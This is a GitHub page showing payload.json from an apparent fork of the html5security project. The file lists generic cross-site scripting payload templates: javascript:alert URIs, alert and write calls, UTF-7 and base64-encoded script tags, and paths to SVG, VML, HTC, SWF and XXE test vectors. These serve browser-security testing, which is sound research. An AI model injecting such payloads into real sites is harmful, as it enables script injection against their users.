forked from Hektve87/html5security
-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathpayload.json
More file actions
36 lines (36 loc) · 1.46 KB
/
payload.json
File metadata and controls
36 lines (36 loc) · 1.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/* Payload - the generic payload templates */
var payloads =
{
'js_uri_alert' : 'javascript:alert(1)',
'js_uri_alert_2' : 'javascript:alert(2)',
'js_uri_alert_3' : 'javascript:alert(3)',
'js_alert' : 'alert(1)',
'js_alert_2' : 'alert(2)',
'js_alert_3' : 'alert(3)',
'js_alert_only' : 'alert',
'js_alert_entities' : 'alert(1)',
'js_write' : 'write(1)',
'js_write_2' : 'write(2)',
'js_write_only' : 'write',
'js_focus' : 'focus()',
'js_focus_only' : 'focus',
'js_blur' : 'blur()',
'js_blur_only' : 'blur',
'js_utf7_alert_1' : '&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi',
'js_utf7_alert_2' : '&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>',
'js_base64_alert' : 'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
'svg_path' : 'test.svg',
'svg_path_2' : 'test2.svg',
'svg_path_3' : 'test5.svg',
'svg_font_path' : 'font.svg',
'css_path' : 'test.css',
'vml_path' : 'test.vml',
'sct_path' : 'test.sct',
'htc_path' : 'test.htc',
'xbl_path' : 'test.xbl',
'xdr_path' : 'test.xdr',
'xxe_path' : 'http://html5sec.org/test.xxe',
'swf_path' : 'test.swf',
'jar_path' : 'test.jar',
'event_path' : 'event.php'
}